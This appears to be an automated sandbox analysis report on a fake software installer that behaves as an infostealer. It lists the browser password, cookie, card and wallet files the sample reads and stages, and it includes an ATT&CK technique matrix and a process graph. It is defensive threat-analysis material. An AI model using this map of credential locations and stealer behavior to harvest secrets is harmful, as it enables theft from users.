Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Downloads\GAOBCVIQIJ.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Downloads\PALRGUCVEH.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Downloads\PWCCAWLGRE.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Downloads\QCFWYSKMHA.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Downloads\QNCYCDFIJJ.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Documents\JDDHMPCDUJ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GAOBCVIQIJ.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QLSSZNHVJI.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QNCYCDFIJJ.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TWKDBEMPGR.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZGGKNSUKOP.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZQIXMVQGAH.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZQIXMVQGAH.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\screenCapture_1.3.2.bat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\app.manifest VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Autofills\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Wallets VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\History\History.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Vpn Tokens-journal VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe VolumeInformation
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

barindex
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Credit Card\Cards.txtJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Cookies\Google_Default.txtJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Passwords\Passwords.txtJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\ProgramData\Passwords\Passwords.txtJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Autofills\Autofills.txtJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.dbJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.dbJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Vortex_CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.dbJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.dbJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.dbJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Windows Management Instrumentation
1
Windows Service
1
Access Token Manipulation
11
Masquerading
1
OS Credential Dumping
1
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
1
Scripting
1
Windows Service
1
Disable or Modify Tools
11
Input Capture
3
Process Discovery
Remote Desktop Protocol11
Input Capture
Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt11
Registry Run Keys / Startup Folder
12
Process Injection
31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin Shares1
Archive Collected Data
SteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
DLL Side-Loading
11
Registry Run Keys / Startup Folder
1
Access Token Manipulation
NTDS1
Application Window Discovery
Distributed Component Object Model21
Data from Local System
Protocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
12
Process Injection
LSA Secrets1
Remote System Discovery
SSH1
Clipboard Data
Fallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials13
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync37
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1541090 Sample: Prismifyr_Installer_v2.1 Se... Startdate: 24/10/2024 Architecture: WINDOWS Score: 60 65 Sigma detected: MSHTA Suspicious Execution 01 2->65 67 Drops large PE files 2->67 8 Prismifyr_Installer_v2.1.exe 47 2->8         started        12 Prismifyr_Installer_v2.1 Setup 1.0.0.exe 12 238 2->12         started        14 Prismifyr_Installer_v2.1.exe 2->14         started        process3 file4 47 C:\Users\...\Prismifyr_Installer_v2.1.exe, PE32+ 8->47 dropped 49 C:\Users\user\AppData\Local\...\history.db, SQLite 8->49 dropped 51 C:\Users\user\AppData\Local\...\webdata.db, SQLite 8->51 dropped 59 11 other files (9 malicious) 8->59 dropped 69 Drops PE files to the startup folder 8->69 71 Tries to harvest and steal browser information (history, passwords, etc) 8->71 73 Drops large PE files 8->73 75 Detected generic credential text file 8->75 16 cmd.exe 8->16         started        18 cmd.exe 8->18         started        20 cmd.exe 1 8->20         started        22 6 other processes 8->22 53 C:\Users\...\Prismifyr_Installer_v2.1.exe, PE32+ 12->53 dropped 55 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 12->55 dropped 57 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 12->57 dropped 61 15 other files (none is malicious) 12->61 dropped signatures5 process6 process7 24 csc.exe 16->24         started        39 2 other processes 16->39 27 cmd.exe 18->27         started        29 conhost.exe 18->29         started        31 conhost.exe 20->31         started        33 tasklist.exe 20->33         started        35 conhost.exe 22->35         started        37 tasklist.exe 22->37         started        41 6 other processes 22->41 file8 63 C:\Users\user\...\screenCapture_1.3.2.exe, PE32 24->63 dropped 43 cvtres.exe 24->43         started        45 mshta.exe 27->45         started        process9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libEGL.dll0%ReversingLabs
